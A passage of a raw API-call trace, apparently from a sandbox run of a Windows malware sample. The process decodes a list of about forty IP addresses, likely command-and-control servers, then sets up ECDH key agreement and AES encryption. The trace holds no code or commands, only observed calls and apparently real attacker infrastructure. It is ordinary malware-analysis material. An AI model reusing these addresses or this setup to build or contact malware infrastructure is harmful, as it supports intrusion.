RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.688] _snwprintf (in: _Dest=0x58b17c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="131.100.24.231") returned 14 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.688] GetProcessHeap () returned 0x530000 [0142.688] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58af88 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.689] _snwprintf (in: _Dest=0x58af9c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="209.59.138.75") returned 13 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ada8 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.689] _snwprintf (in: _Dest=0x58adbc, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="103.8.26.102") returned 12 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58af10 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.689] _snwprintf (in: _Dest=0x58af24, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="178.79.147.66") returned 13 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ae98 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.689] _snwprintf (in: _Dest=0x58aeac, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="51.38.71.0") returned 10 [0142.689] GetProcessHeap () returned 0x530000 [0142.689] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.689] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ae20 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.690] _snwprintf (in: _Dest=0x58ae34, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="79.172.212.216") returned 14 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ad30 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.690] _snwprintf (in: _Dest=0x58ad44, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="162.214.50.39") returned 13 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58acb8 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.690] _snwprintf (in: _Dest=0x58accc, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="203.114.109.124") returned 15 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ac40 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.690] _snwprintf (in: _Dest=0x58ac54, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="45.142.114.231") returned 14 [0142.690] GetProcessHeap () returned 0x530000 [0142.690] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.690] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58ab50 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.691] _snwprintf (in: _Dest=0x58ab64, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="212.237.5.209") returned 13 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b1e0 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.691] _snwprintf (in: _Dest=0x58b1f4, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="104.251.214.46") returned 14 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b258 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.691] _snwprintf (in: _Dest=0x58b26c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="212.237.56.116") returned 14 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b618 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.691] _snwprintf (in: _Dest=0x58b62c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="107.182.225.142") returned 15 [0142.691] GetProcessHeap () returned 0x530000 [0142.691] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b5a0 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.692] _snwprintf (in: _Dest=0x58b5b4, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="104.168.155.129") returned 15 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b528 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.692] _snwprintf (in: _Dest=0x58b53c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="138.185.72.26") returned 13 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b4b0 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.692] _snwprintf (in: _Dest=0x58b4c4, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="45.118.135.203") returned 14 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b438 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.692] _snwprintf (in: _Dest=0x58b44c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="216.158.226.206") returned 15 [0142.692] GetProcessHeap () returned 0x530000 [0142.692] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b3c0 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.693] _snwprintf (in: _Dest=0x58b3d4, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="103.75.201.2") returned 12 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b348 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.693] _snwprintf (in: _Dest=0x58b35c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="158.69.222.101") returned 14 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x58b2d0 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.693] _snwprintf (in: _Dest=0x58b2e4, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="178.63.25.185") returned 13 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3668 [0142.693] GetProcessHeap () returned 0x530000 [0142.693] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.693] _snwprintf (in: _Dest=0x5b367c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="45.118.115.99") returned 13 [0142.693] GetProcessHeap () returned 0x530000 [0142.694] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b35f0 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.694] _snwprintf (in: _Dest=0x5b3604, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="46.55.222.11") returned 12 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3578 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.694] _snwprintf (in: _Dest=0x5b358c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="192.254.71.210") returned 14 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3500 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.694] _snwprintf (in: _Dest=0x5b3514, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="217.182.143.207") returned 15 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3488 [0142.694] GetProcessHeap () returned 0x530000 [0142.694] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.694] _snwprintf (in: _Dest=0x5b349c, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="110.232.117.186") returned 15 [0142.694] GetProcessHeap () returned 0x530000 [0142.695] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3410 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.695] _snwprintf (in: _Dest=0x5b3424, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="81.0.236.90") returned 11 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3398 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.695] _snwprintf (in: _Dest=0x5b33ac, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="176.104.106.96") returned 14 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3320 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.695] _snwprintf (in: _Dest=0x5b3334, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="103.8.26.103") returned 12 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b3f50 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.695] _snwprintf (in: _Dest=0x5b3f64, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="50.116.54.215") returned 13 [0142.695] GetProcessHeap () returned 0x530000 [0142.695] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5b4130 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.696] _snwprintf (in: _Dest=0x5b4144, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="195.154.133.20") returned 14 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a0f50 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.696] _snwprintf (in: _Dest=0x5a0f64, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="51.68.175.8") returned 11 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a0fc8 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.696] _snwprintf (in: _Dest=0x5a0fdc, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="58.227.42.236") returned 13 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a1040 [0142.696] GetProcessHeap () returned 0x530000 [0142.696] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.696] _snwprintf (in: _Dest=0x5a1054, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="173.212.193.249") returned 15 [0142.696] GetProcessHeap () returned 0x530000 [0142.697] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a10b8 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.697] _snwprintf (in: _Dest=0x5a10cc, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="212.237.17.99") returned 13 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a1130 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.697] _snwprintf (in: _Dest=0x5a1144, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="41.76.108.46") returned 12 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a11a8 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.697] _snwprintf (in: _Dest=0x5a11bc, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="45.176.232.124") returned 14 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6c) returned 0x5a1220 [0142.697] GetProcessHeap () returned 0x530000 [0142.697] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.697] _snwprintf (in: _Dest=0x5a1234, _Count=0x10, _Format="%u.%u.%u.%u" | out: _Dest="207.38.84.195") returned 13 [0142.697] GetProcessHeap () returned 0x530000 [0142.698] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.698] GetProcessHeap () returned 0x530000 [0142.698] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d2710 | out: hHeap=0x530000) returned 1 [0142.698] GetProcessHeap () returned 0x530000 [0142.698] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58c000 [0142.698] GetProcessHeap () returned 0x530000 [0142.698] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0142.698] GetProcessHeap () returned 0x530000 [0142.698] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5aca10 [0142.698] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf684, pszAlgId="ECDH_P256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf684) returned 0x0 [0142.699] GetProcessHeap () returned 0x530000 [0142.699] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0142.699] GetProcessHeap () returned 0x530000 [0142.699] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5aca10 | out: hHeap=0x530000) returned 1 [0142.699] BCryptGenerateKeyPair (in: hAlgorithm=0x5ada28, phKey=0x2cf680, dwLength=0x100, dwFlags=0x0 | out: hAlgorithm=0x5ada28, phKey=0x2cf680) returned 0x0 [0142.746] BCryptFinalizeKeyPair (in: hKey=0x584858, dwFlags=0x0 | out: hKey=0x584858) returned 0x0 [0145.934] GetProcessHeap () returned 0x530000 [0145.934] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x5925b8 [0145.934] BCryptExportKey (in: hKey=0x584858, hExportKey=0x0, pszBlobType="ECCPUBLICBLOB", pbOutput=0x2cf698, cbOutput=0x48, pcbResult=0x2cf68c, dwFlags=0x0 | out: pbOutput=0x2cf698, pcbResult=0x2cf68c) returned 0x0 [0145.935] GetProcessHeap () returned 0x530000 [0145.935] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5925b8 | out: hHeap=0x530000) returned 1 [0145.935] GetProcessHeap () returned 0x530000 [0145.935] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x5925b8 [0145.935] BCryptImportKeyPair (in: hAlgorithm=0x5ada28, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x2cf688, pbInput=0x551c10, cbInput=0x48, dwFlags=0x0 | out: phKey=0x2cf688) returned 0x0 [0145.937] GetProcessHeap () returned 0x530000 [0145.937] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5925b8 | out: hHeap=0x530000) returned 1 [0145.937] BCryptSecretAgreement (in: hPrivKey=0x584858, hPubKey=0x584938, phAgreedSecret=0x2cf690, dwFlags=0x0 | out: phAgreedSecret=0x2cf690) returned 0x0 [0145.939] GetProcessHeap () returned 0x530000 [0145.939] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x5a4510 [0145.939] GetProcessHeap () returned 0x530000 [0145.939] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ac8f0 [0145.939] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4d4, pszAlgId="AES", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4d4) returned 0x0 [0145.940] GetProcessHeap () returned 0x530000 [0145.940] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5a4510 | out: hHeap=0x530000) returned 1 [0145.940] GetProcessHeap () returned 0x530000 [0145.941] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ac8f0 | out: hHeap=0x530000) returned 1 [0145.941] GetProcessHeap () returned 0x530000 [0145.941] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5ad808 [0145.941] GetProcessHeap () returned 0x530000 [0145.941] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5ad658 [0145.941] lstrlenW (lpString="SHA256") returned 6 [0145.941] BCryptDeriveKey (in: hSharedSecret=0x5ad838, pwszKDF="HASH", pParameterList=0x2cf4f0, pbDerivedKey=0x2cf514, cbDerivedKey=0x20, pcbResult=0x2cf4d8, dwFlags=0x0 | out: pbDerivedKey=0x2cf514, pcbResult=0x2cf4d8) returned 0x0 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad808 | out: hHeap=0x530000) returned 1 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad658 | out: hHeap=0x530000) returned 1 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x59a0b8 [0145.942] BCryptGetProperty (in: hObject=0x5d3140, pszProperty="ObjectLength", pbOutput=0x58c054, cbOutput=0x4, pcbResult=0x2cf4d8, dwFlags=0x0 | out: pbOutput=0x58c054, pcbResult=0x2cf4d8) returned 0x0 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x59a0b8 | out: hHeap=0x530000) returned 1 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x262) returned 0x5bd868 [0145.942] GetProcessHeap () returned 0x530000 [0145.942] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584958 [0145.943] BCryptImportKey (in: hAlgorithm=0x5d3140, hImportKey=0x0, pszBlobType="KeyDataBlob", phKey=0x58c000, pbKeyObject=0x5bd868, cbKeyObject=0x262, pbInput=0x2cf508, cbInput=0x2c, dwFlags=0x0 | out: phKey=0x58c000, pbKeyObject=0x5bd868) returned 0x0 [0145.943] GetProcessHeap () returned 0x530000 [0145.943] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584958 | out: hHeap=0x530000) returned 1 [0145.943] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5d3140, dwFlags=0x0 | out: hAlgorithm=0x5d3140) returned 0x0 [0145.943] BCryptDestroySecret (in: hSecret=0x5ad838 | out: hSecret=0x5ad838) returned 0x0 [0145.943] BCryptDestroyKey (in: hKey=0x584938 | out: hKey=0x584938) returned 0x0 [0145.943] BCryptDestroyKey (in: hKey=0x584858 | out: hKey=0x584858) returned 0x0 [0145.943] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5ada28, dwFlags=0x0 | out: hAlgorithm=0x5ada28) returned 0x0 [0145.943] GetProcessHeap () returned 0x530000 [0145.943] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x584858 [0145.943] GetProcessHeap () returned 0x530000 [0145.943] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5aca10 [0145.943] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf6cc, pszAlgId="ECDSA_P256", pszImplementation="Microsoft Primitive Provider", 